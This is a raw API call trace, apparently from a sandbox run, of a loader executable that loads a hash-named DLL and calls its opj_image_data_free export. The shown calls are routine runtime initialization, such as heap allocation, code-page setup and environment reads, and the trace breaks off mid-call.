GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7ff626f72300, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0294.618] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x17a) returned 0x449a70 [0294.618] RtlInitializeSListHead (in: ListHead=0x7ff626f72160 | out: ListHead=0x7ff626f72160) [0294.618] GetLastError () returned 0x0 [0294.618] SetLastError (dwErrCode=0x0) [0294.619] GetEnvironmentStringsW () returned 0x454690* [0294.619] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x9cc) returned 0x455070 [0294.619] FreeEnvironmentStringsW (penv=0x454690) returned 1 [0294.619] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x118) returned 0x44a680 [0294.619] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x3e) returned 0x450780 [0294.619] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x5c) returned 0x4407b0 [0294.619] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x62) returned 0x4447a0 [0294.619] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x78) returned 0x44c6c0 [0294.619] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x62) returned 0x4455e0 [0294.619] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x28) returned 0x44b980 [0294.619] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x48) returned 0x450aa0 [0294.619] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x1a) returned 0x44b620 [0294.619] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x3a) returned 0x450190 [0294.619] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x62) returned 0x444510 [0294.619] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x2a) returned 0x44c740 [0294.619] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x2e) returned 0x444810 [0294.619] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x1c) returned 0x44b920 [0294.619] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xd2) returned 0x445870 [0294.619] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x7c) returned 0x444000 [0294.619] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x3a) returned 0x44ffb0 [0294.619] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x90) returned 0x443c20 [0294.619] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x24) returned 0x44b650 [0294.619] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x30) returned 0x444580 [0294.619] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x36) returned 0x445650 [0294.619] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x3c) returned 0x450550 [0294.619] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x52) returned 0x448f30 [0294.620] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x3c) returned 0x450280 [0294.620] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xd6) returned 0x4451b0 [0294.620] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x2e) returned 0x4420d0 [0294.620] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x1e) returned 0x44b830 [0294.620] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x2c) returned 0x442110 [0294.620] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x54) returned 0x4494d0 [0294.620] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x52) returned 0x4492f0 [0294.620] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x24) returned 0x44b350 [0294.620] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x42) returned 0x450870 [0294.620] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x2c) returned 0x442150 [0294.620] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x44) returned 0x450c30 [0294.620] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x24) returned 0x44b950 [0294.620] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x455070 | out: hHeap=0x440000) returned 1 [0294.620] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x1000) returned 0x454690 [0294.620] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff626f52580) returned 0x0 [0294.620] GetStartupInfoW (in: lpStartupInfo=0x14fea0 | out: lpStartupInfo=0x14fea0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0294.620] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_image_data_free" [0294.621] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_image_data_free", pNumArgs=0x14fe70 | out: pNumArgs=0x14fe70) returned 0x449740*="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" [0294.622] LoadLibraryW (lpLibFileName="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") [0294.626] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0294.626] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0294.626] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0294.626] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0294.627] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0294.628] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0294.629] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0294.629] GetProcessHeap () returned 0x440000 [0294.629] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0294.630] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0294.630] GetLastError () returned 0x0 [0294.630] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0294.630] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0294.630] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x3c8) returned 0x455b20 [0294.630] SetLastError (dwErrCode=0x0) [0294.631] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x1200) returned 0x455ef0 [0294.836] GetStartupInfoW (in: lpStartupInfo=0x14f6f0 | out: lpStartupInfo=0x14f6f0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0294.837] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0294.837] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0294.837] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0294.837] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_image_data_free" [0294.837] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_image_data_free" [0294.837] GetACP () returned 0x4e4 [0294.837] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x228) returned 0x44ac70 [0294.837] IsValidCodePage (CodePage=0x4e4) returned 1 [0294.837] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f6b0 | out: lpCPInfo=0x14f6b0) returned 1 [0294.838] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14ef50 | out: lpCPInfo=0x14ef50) returned 1 [0294.838] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0294.838] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14eca0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp") returned 256 [0294.838] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp", cchSrc=256, lpCharType=0x14f270 | out: lpCharType=0x14f270) returned 1 [0294.838] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0294.838] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0294.838] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0294.839] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0294.839] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0294.839] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0294.839] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f070, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ0\x0e\x91_ü\x7f", lpUsedDefaultChar=0x0) returned 256 [0294.839] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0294.839] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0294.839] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0294.839] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0294.839] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f170, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0294.839] RtlInitializeSListHead (in: ListHead=0x7ffc45fcd4a0 | out: ListHead=0x7ffc45fcd4a0) [0294.839] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x1000) returned 0x457100 [0294.840] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14f540, nSize=0x105 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0294.840] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x7ffc5ecd0000 [0294.840] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="AreFileApisANSI") returned 0x7ffc5ecf4820 [0294.840] AreFileApisANSI () returned 1 [0294.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0294.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x7ffc45fcd6c0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpUsedDefaultChar=0x0) returned 42 [0294.840] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xcd) returned 0x444400 [0294.841] GetEnvironmentStringsW () returned 0x458110* [0294.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1254 [0294.841] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x4e6) returned 0x458af0 [0294.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x458af0, cbMultiByte=1254, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1254 [0294.841] FreeEnvironmentStringsW (penv=0x458110) returned 1 [0294.841] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x118) returned 0x44a8c0 [0294.841] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x1f) returned 0x44b890 [0294.841] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x2e) returned 0x444b40 [0294.841] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x31) returned 0x444b80 [0294.841] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x3c) returned 0x450820 [0294.841] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x31) returned 0x444bc0 [0294.841] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x14) returned 0x444c00 [0294.841] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x24) returned 0x44b8f0 [0294.841] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xd) returned 0x443fb0 [0294.841] RtlAllocateHeap 